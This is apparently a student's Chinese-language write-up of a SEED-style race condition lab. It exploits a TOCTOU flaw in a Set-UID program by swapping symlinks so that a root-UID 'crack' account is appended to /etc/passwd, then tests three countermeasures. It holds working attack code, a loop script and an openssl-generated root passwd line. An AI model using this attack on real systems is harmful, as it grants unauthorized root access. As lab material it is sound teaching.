Task 1: Exploit the Race Condition Vulnerabilities
首先通过命令sudo sysctl -w kernel.yama.protected_sticky_symlinks=0关闭Ubuntu的保护措施
被攻击程序代码:
/* vulp.c */
#include <stdio.h>
#include<unistd.h>
#include<string.h>
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK))
{
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
}
攻击程序代码:
#include<unistd.h>
int main()
{
while(1)
{
unlink("/tmp/XYZ");
symlink("/dev/null","/tmp/XYZ");
usleep(1000);
unlink("/tmp/XYZ");
symlink("/etc/passwd","/tmp/XYZ");
usleep(1000);
}
return 0;
}
将两个c文件分别编译为vulp和attack程序
将vulp程序设置为root所有的Set-UID程序
编写bash脚本task1.sh,使该脚本重复运行被攻击程序vulp:
#!/bin/bash
CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while[ "$old"=="$new" ]
do
./vulp < passwd_input
new=$($CHECK_FILE)
done
echo "attack success"
赋予task1.sh脚本可读可写可执行权限
使用seed用户创建输入文件paasswd_input文本文件
在窗口输入命令:
echo "crack:"$(openssl passwd -1 -salt a3g1 123456)":0:0:,,,:/root:/bin/bash"
打印出结果:
crack:$1$a3g1$sjnd1nkAwCfjT4/r0sTA20:0:0:,,,:/root:/bin/bash
将打印出的结果存入passwd_input文本文件中
同时打开两个命令窗体分别运行攻击程序(循环执行)和脚本(循环执行被攻击程序):
窗口1:
$attack
窗口2:
$task1.sh
攻击成功:
查看/etc/passwd文件中加入
crack:$1$a3g1$sjnd1nkAwCfjT4/r0sTA20:0:0:,,,:/root:/bin/bash
使用crack为用户名,123456为密码即可以crack用户身份获得root特权
Task 2: Protection Mechanism A: Repeating
修改被攻击程序的源文件为task2.c文件:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
void no_perm(void)
{
printf("no permission.\n");
exit(EXIT_FAILURE);
}
int main(int argc, char *argv[])
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
long int i;
long int rep = 0; // number of repetition
struct stat inodes[2] = {0};
rep = 10;
/* get user input */
scanf("%50s", buffer );
for (i = 0; i < rep; ++i) {
if(!access(fn, W_OK)){
stat(fn, &inodes[i%2]);
if (i > 0) {
if (inodes[0].st_ino != inodes[1].st_ino) {
no_perm();
}
}
}
else {
no_perm();
}
}
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
通过创建多次竞争,使得攻击者成功的可能性降低
攻击程序不变
脚本bash中做细微修改(执行程序名改为task2)
#!/bin/bash
CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while [ "$old" == "$new" ]
do
./task2 < passwd_input
new=$($CHECK_FILE)
done
echo "attack success"
同时打开两个命令窗体分别运行攻击程序(循环执行)和脚本(循环执行被攻击程序):
窗口1:
$attack
窗口2:
$task1.sh
此次攻击相对于task1的攻击而言,耗时稍长,但在计算机的运算下,也只需几秒钟即可攻击成功。
Task 3: Protection Mechanism B: Principle of Least Privilege
修改被攻击程序的源文件为task3.c
#include <stdio.h>
#include<unistd.h>
#include<string.h>
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
uid_t real_uid=getuid();
uid_t eff_uid=getuid();
seteuid(real_uid);
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK)){
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
seteuid(eff_uid);
}
使用seteuid()把有效用户ID设置为真实用户ID,暂时关闭了root权限。
攻击程序不变
脚本bash中做细微修改(执行程序名改为task3)
#!/bin/bash
CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while [ "$old" == "$new" ]
do
./task3 < passwd_input
new=$($CHECK_FILE)
done
echo "attack success"
同时打开两个命令窗体分别运行攻击程序(循环执行)和脚本(循环执行被攻击程序):
窗口1:
$attack
窗口2:
$task3.sh
运行结果:
seteuid()暂停了程序的root权限,使得攻击无法成功。
Task 4: Protection Mechanism C: Ubuntu’s Built-in Scheme
将被攻击程序的源文件改回task1中的vulp.c,重新编译并设置其为root所有的Set-UID程序。
重新打开保护机制,输入命令:
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1
打开两个窗口
窗口1:
$attack
窗口2:
$task4.sh
运行结果:
该保护机制限制了程序是否可以使用一个全局可写目录中的符号链接,导致无法使用竞态条件漏洞攻击程序,致使攻击失败。
仅供学习交流使用,转载请与作者说明